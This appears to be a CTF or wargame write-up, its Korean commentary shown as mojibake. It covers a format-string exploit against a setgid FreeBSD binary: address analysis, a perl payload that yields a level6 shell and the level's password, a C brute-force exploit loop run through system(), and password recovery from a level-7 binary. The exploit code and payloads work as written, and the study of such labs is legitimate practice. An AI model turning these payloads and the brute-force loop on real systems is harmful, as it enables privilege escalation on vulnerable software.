dtors : 0x80498fc ( 0x8049900 , 0x8049902 <- 0x00 ¶§¹®¿¡ °ø°Ý ºÒ°¡)
got : 0x8049908 ( 0x8049908 , 0x804990a <- 0x0a ¶§¹®¿¡ °ø°Ý ºÒ°¡)
ret : 0xbfbfe13c ( popµÇ´Â stack¿¡ ÀÖ´Â ÁÖ¼Ò ÁÖº¯À¸·Î ÂïÀ» ¼ö ÀÖÀ½ )
shell : 0xbfbfec58 ( ec58(60504) - 0x10(16) = ec48(60488), 1bfbf-ec58=d367(54119) )
$ objdump -h f|grep dtor
15 .dtors 00000008 080498fc 080498fc 000008fc 2**2
$ objdump -h f|grep got
17 .got 00000028 08049908 08049908 00000908 2**2
$ ./.e ( EGG SHELL FOR FREEBSD OS )
Using address: 0xbfbfec58
$ (perl -e 'print "zzzz\x3c\xe1\xbf\xbfzzzz\x3e\xe1\xbf\xbf%16\$60488c%17\$n%18\$54119c%19\$n"';cat)|./f
~~~
~~~
~~~
~~~
~~~
~~~
id
uid=1003(user02) gid=1003(user02) egid=600(level6) groups=600(level6), 1003(user02)
pwd
cd /export/home/level6
ls
LEVEL6_ANSWER
cat *
Congratulations!!
Level6's password : Bmore_Peppers
¤· Automatic Exploit Code Source by xCuter
/********** exploit code for the vuln prog ********/
main()
{
long j,i;
char buf[500];
for(i=0xe0;i<0xff;i+=0x01)
{
for(j=0x00;j<0xff;j+=0x02)
{
memset(buf, 0, 500);
sprintf(buf, "(perl -e 'print \"zzzz\\x%02x\\x%02x\\xbf\\xbfzzzz\\x%02x\\x%02x\\xbf\\xbf%%16\\$60488c%%17\\$n%%18\\$54119c%%19\\$n\"';cat)|./f",j,i,j+0x02,i);
printf("%s\n\n",buf);
system(buf);
}
}
}
/********** just cut here ********/
- »õ·Ò µ¥ÀÌŸ¸ÇÀ» ÀÌ¿ë, °ø°Ý °á°úÁß ³ª¿À´Â ±ÛÀÚ¸¦ ÀÚµ¿¹ÝÀÀ¿¡ ³Ö¾îÁÜÀ¸·Î½á ¾Ë¾Æ¼ ½©ÀÌ ¶³¾îÁú ¶§ ±îÁö °ø°Ý ÁøÇàµÇµµ·Ï ÇÔ.
7. ¹®Á¦ : °ü¸®ÀÚ°¡ ¾î¶² ÇÁ·Î±×·¥À» °³¹ßÇÏ¿´´Âµ¥ ÀÌ ÇÁ·Î±×·¥Àº ¾ÏÈ£È ±â¹ýÀ» ÀÌ¿ëÇÏ¿© Æнº¿öµå¸¦ ¼û°å´Ù°í ÇÑ´Ù.
ÀÌ ÇÁ·Î±×·¥À» ºÐ¼®ÇÏ¿© Æнº¿öµå¸¦ ȹµæÇϽÿÀ.
Ç®ÀÌ : ¤· °Ë»ö
find / -group level7 -exec ls -al {} \; 2>/dev/null
-rwxr-sr-x 2 root level7 6227 May 11 03:09 /usr/sbin/reverse
¤· ºÐ¼®
CRYPTED STR : b416AHqnsisAU
- DES ¹æ½ÄÀ̶ó´Â °ÍÀ» ¾Ë ¼ö ÀÖ¾ú°í, b4 ·Î ½ÃÀÛÇÑ´Ù´Â °Íµµ È®ÀÎ
- Disassembly -> preset_passwd()ÇÔ¼ö - ½Ã°£ ¾øÀ¸´Ï ³ªÁß¿¡.(½ÇÇàÇÏ¸é¼ º¸À϶óĺ´Âµ¥ bsd¼¹ö°¡ ¾ø--)
preset_passwd() ÇÔ¼ö³»¿¡ ¹®ÀÚ¿ ±×´ë·Î Á¸Àç
¤· Á¤´ä : b4ck 4ttack
$ ./f
Password: b4ck 4ttack
Congratulations !!
$
** Èıâ **
Àç¹Õ¾ú½À´Ï´Ù. ¸ðµÎ ¼ö°í ¸¹À¸¼Ì½À´Ï´Ù. ^^; ³²Àº°Ç º»¼±...!!¤»¤»